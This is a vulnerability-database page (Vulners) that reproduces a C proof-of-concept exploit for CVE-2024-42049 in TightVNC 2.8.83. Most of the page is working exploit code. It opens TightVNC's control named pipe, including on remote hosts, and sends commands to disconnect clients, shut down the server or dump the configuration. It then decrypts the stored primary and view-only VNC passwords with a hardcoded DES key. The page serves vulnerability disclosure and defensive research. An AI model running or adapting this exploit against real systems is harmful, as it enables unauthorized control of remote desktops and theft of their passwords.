Vulners
Lucene search
TightVNC 2.8.83 - Control Pipe Manipulation
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2024-42049 | 5 Jun 202519:29 | – | githubexploit |
 | CVE-2024-42049 | 28 Jul 202405:10 | – | circl |
 | TightVNC 安全漏洞 | 28 Jul 202400:00 | – | cnnvd |
 | CVE-2024-42049 | 28 Jul 202400:00 | – | cve |
 | CVE-2024-42049 | 28 Jul 202400:00 | – | cvelist |
 | CVE-2024-42049 | 28 Jul 202402:15 | – | nvd |
 | TightVNC Information Disclosure Vulnerability (Aug 2024) - Windows | 22 Aug 202400:00 | – | openvas |
 | 📄 TightVNC 2.8.83 Control Pipe Manipulation | 9 Jun 202500:00 | – | packetstorm |
 | PT-2024-5229 · Tightvnc · Tightvnc | 27 Jul 202400:00 | – | ptsecurity |
 | CVE-2024-42049 | 23 May 202507:43 | – | redhatcve |
10
# Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation
# Date: 06/09/2025
# Exploit Author: Ionut Zevedei ([email protected])
# Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC
# Vendor Homepage: https://www.tightvnc.com/
# Software Link: https://www.tightvnc.com/download.php
# Version: 2.8.83
# Tested on: Windows 10 x64 - TightVNC 2.5.10, 2.8.81
# CVE : CVE-2024-42049
#include <windows.h>=20
#include <stdio.h>
#include <conio.h>
#include <tchar.h>
#include "descrypt.h"
#define GETBYTE(x, n) (((x) >> ((n) * 8)) & 0xFF)
#define BUFFER_SIZE 512
#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06
#define TVNC_CMD_GET_CLIENT_LIST 0x04
#define TVNC_CMD_SHUTDOWN_SERVER 0x07
#define TVNC_CMD_GET_SERVER_INFO 0x11
#define TVNC_CMD_GET_CONFIG 0x12
const unsigned int commands[6] =3D {
TVNC_CMD_DISCONNECT_ALL_CLIENTS,
TVNC_CMD_GET_CLIENT_LIST,
TVNC_CMD_SHUTDOWN_SERVER,
TVNC_CMD_GET_SERVER_INFO,
TVNC_CMD_GET_CONFIG,
};
unsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 };
void get_bytes(unsigned int data, unsigned char* out) {
out[0] =3D GETBYTE(data, 3);
out[1] =3D GETBYTE(data, 2);
out[2] =3D GETBYTE(data, 1);
out[3] =3D GETBYTE(data, 0);
}
// printf is wonky when printing passwords later
void print_passwd(unsigned char* passwd) {
for (int i =3D 0; i < 8; i++) {
printf("%c", passwd[i]);
}
printf("\n");
}
void print_error(unsigned long error_code) {
unsigned char* buffer;
=20
// damn it windows...
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
error_code,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &buffer,
0, NULL);
printf("[error]: %s\n", buffer);
}
void decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) {
unsigned char primary_passwd[8] =3D { 0x00 };
unsigned char view_only_passwd[8] =3D { 0x00 };
printf("\n\tencrypted primary password: ");
for (int i =3D 0; i < 8; i++) {
primary_passwd[i] =3D buffer_ptr[offset + 8 + i];
printf("%02x ", primary_passwd[i]);
}
printf("\n\tencrypted view-only password: ");
for (int i =3D 0; i < 8; i++) {
view_only_passwd[i] =3D buffer_ptr[offset + i];
printf("%02x ", view_only_passwd[i]);
}
unsigned char primary_passwd_decrypted[8] =3D { 0x00 };
unsigned char view_only_passwd_decrypted[8] =3D { 0x00 };
decrypt(primary_passwd_decrypted, view_only_passwd,
sizeof(primary_passwd_decrypted), des_key);
decrypt(view_only_passwd_decrypted, primary_passwd,
sizeof(view_only_passwd_decrypted), des_key);
printf("\n\tdecrypted primary password: ");
print_passwd(primary_passwd_decrypted);
printf("\tdecrypted view-only password: ");
print_passwd(view_only_passwd_decrypted);
}
BOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) {
unsigned long pipe_mode;
BOOL result =3D FALSE;
printf("[~] opening pipe %s...\n", pipe_name);
while (1) {
*handle_ptr =3D CreateFile(
pipe_name,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
NULL
);
if (*handle_ptr !=3D INVALID_HANDLE_VALUE) {
printf("[+] pipe opened\n");
break;
}
if (GetLastError() !=3D ERROR_PIPE_BUSY) {
printf("[-] could not open pipe\n");
print_error(GetLastError());
return FALSE;
}
printf("[~] waiting for named pipe to be available - if this hangs the =
pipe server might be dead.\n");
WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER);
}
pipe_mode =3D PIPE_READMODE_BYTE;
result =3D SetNamedPipeHandleState(*handle_ptr, &pipe_mode, NULL, NULL);
if (!result) {
printf("[-] failed setting pipe read mode\n");
print_error(GetLastError());
return result;
}
return result;
}
int main(int argc, char* argv[]) {
HANDLE pipe_handle =3D NULL;
unsigned char message[8] =3D { 0x00 };
unsigned char buffer[BUFFER_SIZE] =3D { 0x00 };
BOOL result =3D FALSE;
unsigned long bytes_read, bytes_written;
unsigned int cmd_index =3D 0;
unsigned int offset =3D 30;
if (argc < 3) {
printf("usage: %s <command> <pipe> <offset?>\n", argv[0]);
printf("offset - optional: default is 30 - change as needed\n");
printf("commands:\n");
printf("\t1 - disconnect all clients\n");
printf("\t2 - get client list\n");
printf("\t3 - shutdown server\n");
printf("\t4 - get server info\n");
printf("\t5 - get server config\n");
printf("example pipes:\n\t\\\\192.168.1.42\\pipe\\TightVNC_Service_Cont=
rol\n");
printf("\t\\\\.\\pipe\\TightVNC_Application_Control_On_Session1\n\n");
return 0;
}
char* stop =3D NULL;
cmd_index =3D strtol(argv[1], &stop, 10);
if (stop =3D=3D '\0') {
return 0;
}
cmd_index--;
if (argc =3D=3D 4) {
stop =3D NULL;
offset =3D strtol(argv[3], &stop, 10);
if (offset =3D=3D 0 || stop =3D=3D '\0') {
return 0;
}
}
if (!open_pipe(&pipe_handle, argv[2])) {
goto exit;
}
printf("[i] sending command...\n");
=20
get_bytes(commands[cmd_index], message);
result =3D WriteFile(pipe_handle, message, 8, &bytes_written, NULL);
if (!result) {
printf("[-] failed writing to pipe\n");
print_error(GetLastError());
goto exit;
}
printf("[~] message sent; waiting for reply\n");
do {
result =3D ReadFile(
pipe_handle,
buffer,
BUFFER_SIZE * sizeof(unsigned char),
&bytes_read,
NULL
);
if (!result && GetLastError() !=3D ERROR_MORE_DATA)
break;
printf("[+] got %d bytes back!\n", bytes_read);
printf(" hex: \n\t");
for (int i =3D 0; i < bytes_read; i++) {
printf("%02x ", buffer[i]);
}
printf("\n char: \n\t");
for (int i =3D 0; i < bytes_read; i++) {
printf("%c", buffer[i]);
}
printf("\n\n");
if (cmd_index =3D=3D 4) {
printf("\n[~] command is get config, attempting to decrypt passwords =
using offset %d...\n", offset);
decrypt_passwords(&buffer, offset);
}
memset(buffer, 0, BUFFER_SIZE);
} while (!result);
if (!result)
{
printf("[-] failed reading from pipe\n");
print_error(GetLastError());
goto exit;
}
printf("\n[+] done\n\n");
exit:
if (pipe_handle !=3D NULL) {
CloseHandle(&pipe_handle);
}
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2025 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 3.19.1
EPSS0.05755
SSVC